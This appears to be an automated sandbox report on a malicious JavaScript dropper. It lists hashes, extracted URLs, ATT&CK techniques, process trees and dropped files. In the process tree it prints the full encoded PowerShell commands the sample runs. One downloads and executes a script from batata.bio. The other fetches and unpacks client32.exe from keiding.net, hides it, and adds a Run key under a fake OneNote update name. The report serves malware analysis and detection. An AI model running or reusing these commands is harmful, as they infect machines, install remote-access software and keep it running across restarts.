45d4f18c70984198ea91c793780a12d8d86c14c7633b2616cda13cca1924987a

General

Target

701173_5121702_10.js
Size

30KB
MD5

fe8c65e7e7b53bb9038385ddf31e07a5
SHA1

22f4416c8cfe471dc9119a5b362cf6af1035aa95
SHA256

45d4f18c70984198ea91c793780a12d8d86c14c7633b2616cda13cca1924987a
SHA512

58172accfe0a7bc2f43351b062091062596acac29edf6dd879e301466d82ece14c1a7d865d5c11757b4b6ab0471a699f787c9091455bfc50600ef0b784619239
SSDEEP

768:hGhUylbPR3BhYwFKChxjqdQQWnjc/9vhOxS:hGiaqQQBf

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://batata.bio/f3.ps1

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://keiding.net/comnart.php

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	1648	powershell.exe
6	1648	powershell.exe
8	1648	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1283023626-844874658-3193756055-1000\Software\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate_9143 = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate_9143\\client32.exe"	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1648	powershell.exe
2000	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1516 wrote to memory of 992	1516	wscript.exe	28
PID 1516 wrote to memory of 992	1516	wscript.exe	28
PID 1516 wrote to memory of 992	1516	wscript.exe	28
PID 992 wrote to memory of 1648	992	cmd.exe	30
PID 992 wrote to memory of 1648	992	cmd.exe	30
PID 992 wrote to memory of 1648	992	cmd.exe	30
PID 1648 wrote to memory of 2000	1648	powershell.exe	31
PID 1648 wrote to memory of 2000	1648	powershell.exe	31
PID 1648 wrote to memory of 2000	1648	powershell.exe	31

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\701173_5121702_10.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1516
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powerSHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGEAdABhAHQAYQAuAGIAaQBvAC8AZgAzAC4AcABzADEAIgApAA==
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:992
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powerSHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBiAGEAdABhAHQAYQAuAGIAaQBvAC8AZgAzAC4AcABzADEAIgApAA==
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1648
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACcAaAB0AHQAcABzADoALwAvAGsAZQBpAGQAaQBuAGcALgBuAGUAdAAvAGMAbwBtAG4AYQByAHQALgBwAGgAcAAnADsAIAAkAHIAbgB1AG0APQBHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBtAGkAbgBpAG0AdQBtACAANQAgAC0AbQBhAHgAaQBtAHUAbQAgADkAOwAgACQAcgByAG4AdQBtAD0ARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AbQBpAG4AaQBtAHUAbQAgADEAMAAyADQAIAAtAG0AYQB4AGkAbQB1AG0AIAA5ADkAOQA5ADsAIAAkAGMAaAByAHMAPQAnAGEAYgBjAGQAZQBmAGcAaABpAGoAawBsAG0AbgBvAHAAcwB0AHUAdgB3AHgAeQB6AEEAQgBDAEQARQBGAEcASABJAEoASwBMAE0ATgBPAFAAUgBTAFQAVQBWAFcAWABZAFoAJwA7ACAAJAByAHMAdAByAD0AJwAnADsAIAAkAHIAYQBuAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUgBhAG4AZABvAG0AOwAgAGYAbwByACAAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAcgBuAHUAbQA7ACAAJABpACsAKwApACAAewAkAHIAcwB0AHIAKwA9ACQAYwBoAHIAcwBbACQAcgBhAG4ALgBuAGUAeAB0ACgAMAAsACAAJABjAGgAcgBzAC4ATABlAG4AZwB0AGgAKQBdAH0AOwAgACQAcgB6AGkAcAA9ACQAcgBzAHQAcgArACcALgB6AGkAcAAnADsAIAAkAHAAYQB0AGgAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXAAnACsAJAByAHoAaQBwADsAIAAkAHAAegBpAHAAPQAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQArACcAXABPAE4ARQBOADAAVABFAHUAcABkAGEAdABlAF8AJwArACQAcgByAG4AdQBtADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAAJABwAGEAdABoACAALQBkAGUAcwB0AGkAbgBhAHQAaQBvAG4AcABhAHQAaAAgACQAcAB6AGkAcAA7ACAAJABGAE8ATABEAD0ARwBlAHQALQBJAHQAZQBtACAAJABwAHoAaQBwACAALQBGAG8AcgBjAGUAOwAgACQARgBPAEwARAAuAGEAdAB0AHIAaQBiAHUAdABlAHMAPQAnAEgAaQBkAGQAZQBuACcAOwAgAFIAZQBtAG8AdgBlAC0ASQB0AGUAbQAgAC0AcABhAHQAaAAgACQAcABhAHQAaAA7ACAAYwBkACAAJABwAHoAaQBwADsAIABzAHQAYQByAHQAIABjAGwAaQBlAG4AdAAzADIALgBlAHgAZQA7ACAAJABmAHMAdAByAD0AJABwAHoAaQBwACsAJwBcAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlACcAOwAgACQAcgBuAG0APQAnAE8ATgBFAE4AMABUAEUAdQBwAGQAYQB0AGUAXwAnACsAJAByAHIAbgB1AG0AOwAgAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAE4AYQBtAGUAIAAkAHIAbgBtACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAnAFMAdAByAGkAbgBnACcAOwA=
      4⤵
      Adds Run key to start application
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
62KB

MD5
3ac860860707baaf32469fa7cc7c0192

SHA1
c33c2acdaba0e6fa41fd2f00f186804722477639

SHA256
d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904

SHA512
d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
304B

MD5
16b6d023a7f4bc09aad146f4ae52cad2

SHA1
c48d470ef6ca994380e96d9e4ca10f75ccc80a96

SHA256
5b66bef1e470554d52c63c523148b9e9ee97d176f3bc405083777ba4487fba77

SHA512
7ed1efc80597d784e887a382916e4ead83919bb8e79bcea0ec084516bacfe6d680a87899d819901c689756e2b6411b3a537d6ebcbb0117e8dd6b0481229fbcb1

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab3160.tmp

Filesize
61KB

MD5
fc4666cbca561e864e7fdf883a9e6661

SHA1
2f8d6094c7a34bf12ea0bbf0d51ee9c5bb7939a5

SHA256
10f3deb6c452d749a7451b5d065f4c0449737e5ee8a44f4d15844b503141e65b

SHA512
c71f54b571e01f247f072be4bbebdf5d8410b67eb79a61e7e0d9853fe857ab9bd12f53e6af3394b935560178107291fc4be351b27deb388eba90ba949633d57d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3280.tmp

Filesize
164KB

MD5
4ff65ad929cd9a367680e0e5b1c08166

SHA1
c0af0d4396bd1f15c45f39d3b849ba444233b3a2

SHA256
c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6

SHA512
f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
1c9b395c8eaf3b06f1114005040dc722

SHA1
299fa97bdab4222789502eb47ae8ac32f200f214

SHA256
b35dbe02a8caab09be73f235e1055ca11163ed5e078788017eed67ffaa5ddd24

SHA512
14132f360bb22665c7a84a46c41a89293b50a099c3afea965f2273e43e12cf0d874276d3b97d6ab31dddf4396e2d15f774c5374f3cb88d0216dc69492055a303

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EP762VUFNRT244B7K1BU.temp

Filesize
7KB

MD5
1c9b395c8eaf3b06f1114005040dc722

SHA1
299fa97bdab4222789502eb47ae8ac32f200f214

SHA256
b35dbe02a8caab09be73f235e1055ca11163ed5e078788017eed67ffaa5ddd24

SHA512
14132f360bb22665c7a84a46c41a89293b50a099c3afea965f2273e43e12cf0d874276d3b97d6ab31dddf4396e2d15f774c5374f3cb88d0216dc69492055a303

Download Submit
memory/1648-63-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1648-62-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1648-61-0x00000000024D0000-0x0000000002550000-memory.dmp

Filesize
512KB

Download
memory/1648-60-0x0000000002300000-0x0000000002308000-memory.dmp

Filesize
32KB

Download
memory/1648-59-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

Filesize
2.9MB

Download
memory/2000-135-0x0000000002714000-0x0000000002717000-memory.dmp

Filesize
12KB

Download
memory/2000-136-0x000000000271B000-0x0000000002752000-memory.dmp

Filesize
220KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads